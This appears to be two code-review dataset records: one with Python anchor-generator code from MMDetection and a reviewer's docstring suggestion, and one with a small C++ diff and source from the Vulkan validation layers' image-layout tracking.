flags of anchors in multiple levels. """ assert self.num_levels == len(featmap_sizes) multi_level_flags = [] for i in range(self.num_levels): anchor_stride = self.strides[i] feat_h, feat_w = featmap_sizes[i] h, w = pad_shape[:2] valid_feat_h = min(int(np.ceil(h / anchor_stride[0])), feat_h) valid_feat_w = min(int(np.ceil(w / anchor_stride[1])), feat_w) flags = self.single_level_valid_flags((feat_h, feat_w), (valid_feat_h, valid_feat_w), self.num_base_anchors[i], device=device) multi_level_flags.append(flags) return multi_level_flags def single_level_valid_flags(self, featmap_size, valid_size, num_base_anchors, device='cuda'): """Generate the valid flags of anchor in a single feature map. Args: featmap_size (tuple[int]): The size of feature maps. valid_size (tuple[int]): The valid size of the feature maps. 
num_base_anchors (int): The number of base anchors. device (str, optional): Device where the flags will be put on. Defaults to 'cuda'. Returns: torch.Tensor: The valid flags of each anchor in a single level \ feature map. """ feat_h, feat_w = featmap_size valid_h, valid_w = valid_size assert valid_h <= feat_h and valid_w <= feat_w valid_x = torch.zeros(feat_w, dtype=torch.bool, device=device) valid_y = torch.zeros(feat_h, dtype=torch.bool, device=device) valid_x[:valid_w] = 1 valid_y[:valid_h] = 1 valid_xx, valid_yy = self._meshgrid(valid_x, valid_y) valid = valid_xx & valid_yy valid = valid[:, None].expand(valid.size(0), num_base_anchors).contiguous().view(-1) return valid def __repr__(self): """str: a string that describes the module""" indent_str = ' ' repr_str = self.__class__.__name__ + '(\n' repr_str += f'{indent_str}strides={self.strides},\n' repr_str += f'{indent_str}ratios={self.ratios},\n' repr_str += f'{indent_str}scales={self.scales},\n' repr_str += f'{indent_str}base_sizes={self.base_sizes},\n' repr_str += f'{indent_str}scale_major={self.scale_major},\n' repr_str += f'{indent_str}octave_base_scale=' repr_str += f'{self.octave_base_scale},\n' repr_str += f'{indent_str}scales_per_octave=' repr_str += f'{self.scales_per_octave},\n' repr_str += f'{indent_str}num_levels={self.num_levels}\n' repr_str += f'{indent_str}centers={self.centers},\n' repr_str += f'{indent_str}center_offset={self.center_offset})' return repr_str @ANCHOR_GENERATORS.register_module() class SSDAnchorGenerator(AnchorGenerator): """Anchor generator for SSD. Args: strides (list[int] | list[tuple[int, int]]): Strides of anchors in multiple feature levels. ratios (list[float]): The list of ratios between the height and width of anchors in a single level. basesize_ratio_range (tuple(float)): Ratio range of anchors. input_size (int): Size of feature map, 300 for SSD300, 512 for SSD512. scale_major (bool): Whether to multiply scales first when generating base anchors. 
If true, the anchors in the same row will have the same scales. It is always set to be False in SSD. """ def __init__(self, strides, ratios, basesize_ratio_range, input_size=300, scale_major=True): assert len(strides) == len(ratios) assert mmcv.is_tuple_of(basesize_ratio_range, float) self.strides = [_pair(stride) for stride in strides] self.input_size = input_size self.centers = [(stride[0] / 2., stride[1] / 2.) for stride in self.strides] self.basesize_ratio_range = basesize_ratio_range # calculate anchor ratios and sizes min_ratio, max_ratio = basesize_ratio_range min_ratio = int(min_ratio * 100) max_ratio = int(max_ratio * 100) step = int(np.floor(max_ratio - min_ratio) / (self.num_levels - 2)) min_sizes = [] max_sizes = [] for ratio in range(int(min_ratio), int(max_ratio) + 1, step): min_sizes.append(int(self.input_size * ratio / 100)) max_sizes.append(int(self.input_size * (ratio + step) / 100)) if self.input_size == 300: if basesize_ratio_range[0] == 0.15: # SSD300 COCO min_sizes.insert(0, int(self.input_size * 7 / 100)) max_sizes.insert(0, int(self.input_size * 15 / 100)) elif basesize_ratio_range[0] == 0.2: # SSD300 VOC min_sizes.insert(0, int(self.input_size * 10 / 100)) max_sizes.insert(0, int(self.input_size * 20 / 100)) else: raise ValueError( 'basesize_ratio_range[0] should be either 0.15' 'or 0.2 when input_size is 300, got ' f'{basesize_ratio_range[0]}.') elif self.input_size == 512: if basesize_ratio_range[0] == 0.1: # SSD512 COCO min_sizes.insert(0, int(self.input_size * 4 / 100)) max_sizes.insert(0, int(self.input_size * 10 / 100)) elif basesize_ratio_range[0] == 0.15: # SSD512 VOC min_sizes.insert(0, int(self.input_size * 7 / 100)) max_sizes.insert(0, int(self.input_size * 15 / 100)) else: raise ValueError('basesize_ratio_range[0] should be either 0.1' 'or 0.15 when input_size is 512, got' ' {basesize_ratio_range[0]}.') else: raise ValueError('Only support 300 or 512 in SSDAnchorGenerator' f', got {self.input_size}.') anchor_ratios = [] 
anchor_scales = [] for k in range(len(self.strides)): scales = [1., np.sqrt(max_sizes[k] / min_sizes[k])] anchor_ratio = [1.] for r in ratios[k]: anchor_ratio += [1 / r, r] # 4 or 6 ratio anchor_ratios.append(torch.Tensor(anchor_ratio)) anchor_scales.append(torch.Tensor(scales)) self.base_sizes = min_sizes self.scales = anchor_scales self.ratios = anchor_ratios self.scale_major = scale_major self.center_offset = 0 self.base_anchors = self.gen_base_anchors() def gen_base_anchors(self): """Generate base anchors. Returns: list(torch.Tensor): Base anchors of a feature grid in multiple \ feature levels. """ multi_level_base_anchors = [] for i, base_size in enumerate(self.base_sizes): base_anchors = self.gen_single_level_base_anchors( base_size, scales=self.scales[i], ratios=self.ratios[i], center=self.centers[i]) indices = list(range(len(self.ratios[i]))) indices.insert(1, len(indices)) base_anchors = torch.index_select(base_anchors, 0, torch.LongTensor(indices)) multi_level_base_anchors.append(base_anchors) return multi_level_base_anchors def __repr__(self): """str: a string that describes the module""" indent_str = ' ' repr_str = self.__class__.__name__ + '(\n' repr_str += f'{indent_str}strides={self.strides},\n' repr_str += f'{indent_str}scales={self.scales},\n' repr_str += f'{indent_str}scale_major={self.scale_major},\n' repr_str += f'{indent_str}input_size={self.input_size},\n' repr_str += f'{indent_str}scales={self.scales},\n' repr_str += f'{indent_str}ratios={self.ratios},\n' repr_str += f'{indent_str}num_levels={self.num_levels},\n' repr_str += f'{indent_str}base_sizes={self.base_sizes},\n' repr_str += f'{indent_str}basesize_ratio_range=' repr_str += f'{self.basesize_ratio_range})' return repr_str @ANCHOR_GENERATORS.register_module() class LegacyAnchorGenerator(AnchorGenerator): """Legacy anchor generator used in MMDetection V1.x. Note: Difference to the V2.0 anchor generator: 1. The center offset of V1.x anchors are set to be 0.5 rather than 0. 2. 
The width/height are minused by 1 when calculating the anchors' \ centers and corners to meet the V1.x coordinate system. 3. The anchors' corners are quantized. Args: strides (list[int] | list[tuple[int]]): Strides of anchors in multiple feature levels. ratios (list[float]): The list of ratios between the height and width of anchors in a single level. scales (list[int] | None): Anchor scales for anchors in a single level. It cannot be set at the same time if `octave_base_scale` and `scales_per_octave` are set. base_sizes (list[int]): The basic sizes of anchors in multiple levels. If None is given, strides will be used to generate base_sizes. scale_major (bool): Whether to multiply scales first when generating base anchors. If true, the anchors in the same row will have the same scales. By default it is True in V2.0 octave_base_scale (int): The base scale of octave. scales_per_octave (int): Number of scales for each octave. `octave_base_scale` and `scales_per_octave` are usually used in retinanet and the `scales` should be None when they are set. centers (list[tuple[float, float]] | None): The centers of the anchor relative to the feature grid center in multiple feature levels. By default it is set to be None and not used. It a list of float is given, this list will be used to shift the centers of anchors. center_offset (float): The offset of center in propotion to anchors' width and height. By default it is 0.5 in V2.0 but it should be 0.5 in v1.x models. Examples: >>> from mmdet.core import LegacyAnchorGenerator >>> self = LegacyAnchorGenerator( >>> [16], [1.], [1.], [9], center_offset=0.5) >>> all_anchors = self.grid_anchors(((2, 2),), device='cpu') >>> print(all_anchors) [tensor([[ 0., 0., 8., 8.], [16., 0., 24., 8.], [ 0., 16., 8., 24.], [16., 16., 24., 24.]])] """ def gen_single_level_base_anchors(self, base_size, scales, ratios, center=None): """Generate base anchors of a single level. 
Note: The width/height of anchors are minused by 1 when calculating \ the centers and corners to meet the V1.x coordinate system. Args: base_size (int | float): Basic size of an anchor. scales (torch.Tensor): Scales of the anchor. ratios (torch.Tensor): The ratio between between the height. and width of anchors in a single level. center (tuple[float], optional): The center of the base anchor related to a single feature grid. Defaults to None. Returns: torch.Tensor: Anchors in a single-level feature map. """ w = base_size h = base_size if center is None: x_center = self.center_offset * (w - 1) y_center = self.center_offset * (h - 1) else: x_center, y_center = center h_ratios = torch.sqrt(ratios) w_ratios = 1 / h_ratios if self.scale_major: ws = (w * w_ratios[:, None] * scales[None, :]).view(-1) hs = (h * h_ratios[:, None] * scales[None, :]).view(-1) else: ws = (w * scales[:, None] * w_ratios[None, :]).view(-1) hs = (h * scales[:, None] * h_ratios[None, :]).view(-1) # use float anchor and the anchor's center is aligned with the # pixel center base_anchors = [ x_center - 0.5 * (ws - 1), y_center - 0.5 * (hs - 1), x_center + 0.5 * (ws - 1), y_center + 0.5 * (hs - 1) ] base_anchors = torch.stack(base_anchors, dim=-1).round() return base_anchors @ANCHOR_GENERATORS.register_module() class LegacySSDAnchorGenerator(SSDAnchorGenerator, LegacyAnchorGenerator): """Legacy anchor generator used in MMDetection V1.x. The difference between `LegacySSDAnchorGenerator` and `SSDAnchorGenerator` can be found in `LegacyAnchorGenerator`. """ def __init__(self, strides, ratios, basesize_ratio_range, input_size=300, scale_major=True): super(LegacySSDAnchorGenerator, self).__init__(strides, ratios, basesize_ratio_range, input_size, scale_major) self.centers = [((stride - 1) / 2., (stride - 1) / 2.) for stride in strides] self.base_anchors = self.gen_base_anchors() @ANCHOR_GENERATORS.register_module() class YOLOAnchorGenerator(AnchorGenerator): """Anchor generator for YOLO. 
Args: strides (list[int] | list[tuple[int, int]]): Strides of anchors in multiple feature levels. base_sizes (list[list[tuple[int, int]]]): The basic sizes of anchors in multiple levels. """ def __init__(self, strides, base_sizes): self.strides = [_pair(stride) for stride in strides] self.centers = [(stride[0] / 2., stride[1] / 2.) for stride in self.strides] self.base_sizes = [] num_anchor_per_level = len(base_sizes[0]) for base_sizes_per_level in base_sizes: assert num_anchor_per_level == len(base_sizes_per_level) self.base_sizes.append( [_pair(base_size) for base_size in base_sizes_per_level]) self.base_anchors = self.gen_base_anchors() @property def num_levels(self): """int: number of feature levels that the generator will be applied""" return len(self.base_sizes) def gen_base_anchors(self): """Generate base anchors. Returns: list(torch.Tensor): Base anchors of a feature grid in multiple \ feature levels. """ multi_level_base_anchors = [] for i, base_sizes_per_level in enumerate(self.base_sizes): center = None if self.centers is not None: center = self.centers[i] multi_level_base_anchors.append( self.gen_single_level_base_anchors(base_sizes_per_level, center)) return multi_level_base_anchors def gen_single_level_base_anchors(self, base_sizes_per_level, center=None): """Generate base anchors of a single level. Args: base_sizes_per_level (list[tuple[int, int]]): Basic sizes of anchors. center (tuple[float], optional): The center of the base anchor related to a single feature grid. Defaults to None. Returns: torch.Tensor: Anchors in a single-level feature maps. 
""" x_center, y_center = center base_anchors = [] for base_size in base_sizes_per_level: w, h = base_size # use float anchor and the anchor's center is aligned with the # pixel center base_anchor = torch.Tensor([ x_center - 0.5 * w, y_center - 0.5 * h, x_center + 0.5 * w, y_center + 0.5 * h ]) base_anchors.append(base_anchor) base_anchors = torch.stack(base_anchors, dim=0) return base_anchors def responsible_flags(self, featmap_sizes, gt_bboxes, device='cuda'): """Generate responsible anchor flags of grid cells in multiple scales. Args: featmap_sizes (list(tuple)): List of feature map sizes in multiple feature levels. gt_bboxes (Tensor): Ground truth boxes, shape (n, 4). device (str): Device where the anchors will be put on. Return: list(torch.Tensor): responsible flags of anchors in multiple level """ assert self.num_levels == len(featmap_sizes) multi_level_responsible_flags = [] for i in range(self.num_levels): anchor_stride = self.strides[i] flags = self.single_level_responsible_flags( featmap_sizes[i], gt_bboxes, anchor_stride, self.num_base_anchors[i], device=device) multi_level_responsible_flags.append(flags) return multi_level_responsible_flags def single_level_responsible_flags(self, featmap_size, gt_bboxes, stride, num_base_anchors, device='cuda'): """Generate the responsible flags of anchor in a single feature map. Args: featmap_size (tuple[int]): The size of feature maps. gt_bboxes (Tensor): Ground truth boxes, shape (n, 4). stride (tuple(int)): stride of current level num_base_anchors (int): The number of base anchors. device (str, optional): Device where the flags will be put on. Defaults to 'cuda'. Returns: torch.Tensor: The valid flags of each anchor in a single level \ feature map. 
""" feat_h, feat_w = featmap_size gt_bboxes_cx = ((gt_bboxes[:, 0] + gt_bboxes[:, 2]) * 0.5).to(device) gt_bboxes_cy = ((gt_bboxes[:, 1] + gt_bboxes[:, 3]) * 0.5).to(device) gt_bboxes_grid_x = torch.floor(gt_bboxes_cx / stride[0]).long() gt_bboxes_grid_y = torch.floor(gt_bboxes_cy / stride[1]).long() # row major indexing gt_bboxes_grid_idx = gt_bboxes_grid_y * feat_w + gt_bboxes_grid_x responsible_grid = torch.zeros( feat_h * feat_w, dtype=torch.uint8, device=device) responsible_grid[gt_bboxes_grid_idx] = 1 responsible_grid = responsible_grid[:, None].expand( responsible_grid.size(0), num_base_anchors).contiguous().view(-1) return responsible_grid
1
21,274
We may also update the docstring in the AnchorGenerator's arguments at around line 15.
open-mmlab-mmdetection
py
@@ -930,7 +930,7 @@ bool CoreChecks::ValidateAndUpdateQFOScoreboard(const debug_report_data *report_ " duplicates existing barrier submitted in this batch from command buffer %s.", "vkQueueSubmit()", BarrierRecord::BarrierName(), operation, BarrierRecord::HandleName(), report_data->FormatHandle(barrier.handle).c_str(), barrier.srcQueueFamilyIndex, barrier.dstQueueFamilyIndex, - report_data->FormatHandle(inserted.first->second).c_str()); + report_data->FormatHandle(inserted.first->second->commandBuffer).c_str()); } return skip; }
1
/* Copyright (c) 2015-2019 The Khronos Group Inc. * Copyright (c) 2015-2019 Valve Corporation * Copyright (c) 2015-2019 LunarG, Inc. * Copyright (C) 2015-2019 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * Author: Mark Lobodzinski <[email protected]> * Author: Dave Houlton <[email protected]> * Shannon McPherson <[email protected]> */ // Allow use of STL min and max functions in Windows #define NOMINMAX #include <cmath> #include <set> #include <sstream> #include <string> #include "vk_enum_string_helper.h" #include "vk_layer_data.h" #include "vk_layer_utils.h" #include "vk_layer_logging.h" #include "vk_typemap_helper.h" #include "chassis.h" #include "core_validation.h" #include "shader_validation.h" #include "descriptor_sets.h" #include "buffer_validation.h" uint32_t FullMipChainLevels(uint32_t height, uint32_t width, uint32_t depth) { // uint cast applies floor() return 1u + (uint32_t)log2(std::max({height, width, depth})); } uint32_t FullMipChainLevels(VkExtent3D extent) { return FullMipChainLevels(extent.height, extent.width, extent.depth); } uint32_t FullMipChainLevels(VkExtent2D extent) { return FullMipChainLevels(extent.height, extent.width); } void CoreChecks::SetLayout(GLOBAL_CB_NODE *pCB, ImageSubresourcePair imgpair, const VkImageLayout &layout) { auto it = pCB->imageLayoutMap.find(imgpair); if (it != pCB->imageLayoutMap.end()) { it->second.layout = layout; } else { assert(imgpair.hasSubresource); IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(pCB, 
imgpair.image, imgpair.subresource, node)) { node.initialLayout = layout; } SetLayout(pCB, imgpair, {node.initialLayout, layout}); } } template <class OBJECT, class LAYOUT> void CoreChecks::SetLayout(OBJECT *pObject, VkImage image, VkImageSubresource range, const LAYOUT &layout) { ImageSubresourcePair imgpair = {image, true, range}; SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_COLOR_BIT); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_DEPTH_BIT); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_STENCIL_BIT); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } } template <class OBJECT, class LAYOUT> void CoreChecks::SetLayout(OBJECT *pObject, ImageSubresourcePair imgpair, const LAYOUT &layout, VkImageAspectFlags aspectMask) { if (imgpair.subresource.aspectMask & aspectMask) { imgpair.subresource.aspectMask = aspectMask; SetLayout(pObject, imgpair, layout); } } // Set the layout in supplied map void CoreChecks::SetLayout(std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &imageLayoutMap, ImageSubresourcePair imgpair, VkImageLayout layout) { auto it = imageLayoutMap.find(imgpair); if (it != imageLayoutMap.end()) { it->second.layout = layout; // Update } else { imageLayoutMap[imgpair].layout = layout; // Insert } } bool CoreChecks::FindLayoutVerifyNode(GLOBAL_CB_NODE const *pCB, ImageSubresourcePair imgpair, IMAGE_CMD_BUF_LAYOUT_NODE &node, const VkImageAspectFlags aspectMask) { if (!(imgpair.subresource.aspectMask & aspectMask)) { return false; } VkImageAspectFlags oldAspectMask = imgpair.subresource.aspectMask; imgpair.subresource.aspectMask = aspectMask; auto imgsubIt = pCB->imageLayoutMap.find(imgpair); if (imgsubIt == pCB->imageLayoutMap.end()) { return 
false; } if (node.layout != VK_IMAGE_LAYOUT_MAX_ENUM && node.layout != imgsubIt->second.layout) { log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(imgpair.image), kVUID_Core_DrawState_InvalidLayout, "Cannot query for VkImage %s layout when combined aspect mask %d has multiple layout types: %s and %s", report_data->FormatHandle(imgpair.image).c_str(), oldAspectMask, string_VkImageLayout(node.layout), string_VkImageLayout(imgsubIt->second.layout)); } if (node.initialLayout != VK_IMAGE_LAYOUT_MAX_ENUM && node.initialLayout != imgsubIt->second.initialLayout) { log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(imgpair.image), kVUID_Core_DrawState_InvalidLayout, "Cannot query for VkImage %s" " layout when combined aspect mask %d has multiple initial layout types: %s and %s", report_data->FormatHandle(imgpair.image).c_str(), oldAspectMask, string_VkImageLayout(node.initialLayout), string_VkImageLayout(imgsubIt->second.initialLayout)); } node = imgsubIt->second; return true; } bool CoreChecks::FindLayoutVerifyLayout(ImageSubresourcePair imgpair, VkImageLayout &layout, const VkImageAspectFlags aspectMask) { if (!(imgpair.subresource.aspectMask & aspectMask)) { return false; } VkImageAspectFlags oldAspectMask = imgpair.subresource.aspectMask; imgpair.subresource.aspectMask = aspectMask; auto imgsubIt = (*GetImageLayoutMap()).find(imgpair); if (imgsubIt == (*GetImageLayoutMap()).end()) { return false; } if (layout != VK_IMAGE_LAYOUT_MAX_ENUM && layout != imgsubIt->second.layout) { log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(imgpair.image), kVUID_Core_DrawState_InvalidLayout, "Cannot query for VkImage %s layout when combined aspect mask %d has multiple layout types: %s and %s", report_data->FormatHandle(imgpair.image).c_str(), oldAspectMask, string_VkImageLayout(layout), 
string_VkImageLayout(imgsubIt->second.layout)); } layout = imgsubIt->second.layout; return true; } // Find layout(s) on the command buffer level bool CoreChecks::FindCmdBufLayout(GLOBAL_CB_NODE const *pCB, VkImage image, VkImageSubresource range, IMAGE_CMD_BUF_LAYOUT_NODE &node) { ImageSubresourcePair imgpair = {image, true, range}; node = IMAGE_CMD_BUF_LAYOUT_NODE(VK_IMAGE_LAYOUT_MAX_ENUM, VK_IMAGE_LAYOUT_MAX_ENUM); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_COLOR_BIT); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_DEPTH_BIT); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_STENCIL_BIT); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } if (node.layout == VK_IMAGE_LAYOUT_MAX_ENUM) { imgpair = {image, false, VkImageSubresource()}; auto imgsubIt = pCB->imageLayoutMap.find(imgpair); if (imgsubIt == pCB->imageLayoutMap.end()) return false; // TODO: This is ostensibly a find function but it changes state here node = imgsubIt->second; } return true; } // Find layout(s) on the global level bool CoreChecks::FindGlobalLayout(ImageSubresourcePair imgpair, VkImageLayout &layout) { layout = VK_IMAGE_LAYOUT_MAX_ENUM; FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_COLOR_BIT); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_DEPTH_BIT); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_STENCIL_BIT); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); FindLayoutVerifyLayout(imgpair, layout, 
// Collect the globally-tracked layouts of all subresources of |image| into |layouts|.
// Returns false when the image has no tracked subresources or no image state.
bool CoreChecks::FindLayouts(VkImage image, std::vector<VkImageLayout> &layouts) {
    auto sub_data = (*GetImageSubresourceMap()).find(image);
    if (sub_data == (*GetImageSubresourceMap()).end()) return false;
    auto image_state = GetImageState(image);
    if (!image_state) return false;
    bool ignoreGlobal = false;
    // TODO: Make this robust for >1 aspect mask. Now it will just say ignore potential errors in this case.
    // If every (layer, level) pair has its own entry (plus the image-wide one), the image-wide entry is stale.
    if (sub_data->second.size() >= (image_state->createInfo.arrayLayers * image_state->createInfo.mipLevels + 1)) {
        ignoreGlobal = true;
    }
    for (auto imgsubpair : sub_data->second) {
        if (ignoreGlobal && !imgsubpair.hasSubresource) continue;
        auto img_data = (*GetImageLayoutMap()).find(imgsubpair);
        if (img_data != (*GetImageLayoutMap()).end()) {
            layouts.push_back(img_data->second.layout);
        }
    }
    return true;
}

// Look up the layout of a single aspect of |imgpair| in the supplied map; true when an entry exists.
bool CoreChecks::FindLayout(const std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &imageLayoutMap,
                            ImageSubresourcePair imgpair, VkImageLayout &layout, const VkImageAspectFlags aspectMask) {
    if (!(imgpair.subresource.aspectMask & aspectMask)) {
        return false;
    }
    imgpair.subresource.aspectMask = aspectMask;
    auto imgsubIt = imageLayoutMap.find(imgpair);
    if (imgsubIt == imageLayoutMap.end()) {
        return false;
    }
    layout = imgsubIt->second.layout;
    return true;
}

// find layout in supplied map
// Probes every aspect of |imgpair| (later probes overwrite earlier ones), then falls back to the
// image-wide key. NOTE(review): unlike FindGlobalLayout this does no cross-aspect consistency check.
bool CoreChecks::FindLayout(const std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &imageLayoutMap,
                            ImageSubresourcePair imgpair, VkImageLayout &layout) {
    layout = VK_IMAGE_LAYOUT_MAX_ENUM;  // sentinel: "not found yet"
    FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_COLOR_BIT);
    FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_DEPTH_BIT);
    FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_STENCIL_BIT);
    FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_METADATA_BIT);
    if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) {
        FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR);
        FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR);
        FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR);
    }
    // Image+subresource not found, look for image handle w/o subresource
    if (layout == VK_IMAGE_LAYOUT_MAX_ENUM) {
        imgpair = {imgpair.image, false, VkImageSubresource()};
        auto imgsubIt = imageLayoutMap.find(imgpair);
        if (imgsubIt == imageLayoutMap.end()) return false;
        layout = imgsubIt->second.layout;
    }
    return true;
}
// Set the layout on the global level
// Upserts |layout| for |imgpair| in the global layout map and registers the pair in the
// per-image subresource list if not already present.
void CoreChecks::SetGlobalLayout(ImageSubresourcePair imgpair, const VkImageLayout &layout) {
    VkImage &image = imgpair.image;
    auto &lmap = (*GetImageLayoutMap());
    auto data = lmap.find(imgpair);
    if (data != lmap.end()) {
        data->second.layout = layout;  // Update
    } else {
        lmap[imgpair].layout = layout;  // Insert
    }
    auto &image_subresources = (*GetImageSubresourceMap())[image];
    auto subresource = std::find(image_subresources.begin(), image_subresources.end(), imgpair);
    if (subresource == image_subresources.end()) {
        image_subresources.push_back(imgpair);
    }
}

// Set the layout on the cmdbuf level
// Upserts |node| (old + new layout) for |imgpair| in the command buffer's layout map.
void CoreChecks::SetLayout(GLOBAL_CB_NODE *pCB, ImageSubresourcePair imgpair, const IMAGE_CMD_BUF_LAYOUT_NODE &node) {
    auto it = pCB->imageLayoutMap.find(imgpair);
    if (it != pCB->imageLayoutMap.end()) {
        it->second = node;  // Update
    } else {
        pCB->imageLayoutMap[imgpair] = node;  // Insert
    }
}

// Set image layout for given VkImageSubresourceRange struct
// Walks every (level, layer) in |image_subresource_range| and records |layout| for each, widening the
// aspect mask where the spec treats aspects as aliases (combined depth/stencil; COLOR on multi-planar images).
// NOTE(review): calls a SetLayout(cb, VkImage, VkImageSubresource, layout) overload defined elsewhere in this file.
void CoreChecks::SetImageLayout(GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *image_state,
                                VkImageSubresourceRange image_subresource_range, const VkImageLayout &layout) {
    assert(image_state);
    cb_node->image_layout_change_count++;  // Change the version of this data to force revalidation
    for (uint32_t level_index = 0; level_index < image_subresource_range.levelCount; ++level_index) {
        uint32_t level = image_subresource_range.baseMipLevel + level_index;
        for (uint32_t layer_index = 0; layer_index < image_subresource_range.layerCount; layer_index++) {
            uint32_t layer = image_subresource_range.baseArrayLayer + layer_index;
            VkImageSubresource sub = {image_subresource_range.aspectMask, level, layer};
            // TODO: If ImageView was created with depth or stencil, transition both layouts as the aspectMask is ignored and both
            // are used. Verify that the extra implicit layout is OK for descriptor set layout validation
            if (image_subresource_range.aspectMask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT)) {
                if (FormatIsDepthAndStencil(image_state->createInfo.format)) {
                    sub.aspectMask |= (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT);
                }
            }
            // For multiplane images, IMAGE_ASPECT_COLOR is an alias for all of the plane bits
            if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) {
                if (FormatIsMultiplane(image_state->createInfo.format)) {
                    if (sub.aspectMask & VK_IMAGE_ASPECT_COLOR_BIT) {
                        sub.aspectMask &= ~VK_IMAGE_ASPECT_COLOR_BIT;
                        sub.aspectMask |= VK_IMAGE_ASPECT_PLANE_0_BIT_KHR | VK_IMAGE_ASPECT_PLANE_1_BIT_KHR;
                        if (FormatPlaneCount(image_state->createInfo.format) > 2) {
                            sub.aspectMask |= VK_IMAGE_ASPECT_PLANE_2_BIT_KHR;
                        }
                    }
                }
            }
            SetLayout(cb_node, image_state->image, sub, layout);
        }
    }
}

// Set image layout for given VkImageSubresourceLayers struct
// Convenience overload: converts the layers struct (single mip level) into a range and delegates.
void CoreChecks::SetImageLayout(GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *image_state,
                                VkImageSubresourceLayers image_subresource_layers, const VkImageLayout &layout) {
    // Transfer VkImageSubresourceLayers into VkImageSubresourceRange struct
    VkImageSubresourceRange image_subresource_range;
    image_subresource_range.aspectMask = image_subresource_layers.aspectMask;
    image_subresource_range.baseArrayLayer = image_subresource_layers.baseArrayLayer;
    image_subresource_range.layerCount = image_subresource_layers.layerCount;
    image_subresource_range.baseMipLevel = image_subresource_layers.mipLevel;
    image_subresource_range.levelCount = 1;
    SetImageLayout(cb_node, image_state, image_subresource_range, layout);
}
// Set image layout for all slices of an image view
void CoreChecks::SetImageViewLayout(GLOBAL_CB_NODE *cb_node, IMAGE_VIEW_STATE *view_state, const VkImageLayout &layout) {
    assert(view_state);

    IMAGE_STATE *image_state = GetImageState(view_state->create_info.image);
    VkImageSubresourceRange sub_range = view_state->create_info.subresourceRange;

    // When changing the layout of a 3D image subresource via a 2D or 2D_ARRRAY image view, all depth slices of
    // the subresource mip level(s) are transitioned, ignoring any layers restriction in the subresource info.
    if ((image_state->createInfo.imageType == VK_IMAGE_TYPE_3D) && (view_state->create_info.viewType != VK_IMAGE_VIEW_TYPE_3D)) {
        sub_range.baseArrayLayer = 0;
        sub_range.layerCount = image_state->createInfo.extent.depth;
    }

    SetImageLayout(cb_node, image_state, sub_range, layout);
}

// Handle-based convenience overload: resolves the view state and delegates.
void CoreChecks::SetImageViewLayout(GLOBAL_CB_NODE *cb_node, VkImageView imageView, const VkImageLayout &layout) {
    auto view_state = GetImageViewState(imageView);
    SetImageViewLayout(cb_node, view_state, layout);
}

// Validate that |layout| (an attachment's initial/final/reference layout, described by |variable_name|)
// is compatible with the usage flags of the framebuffer image it is applied to. Emits one error per
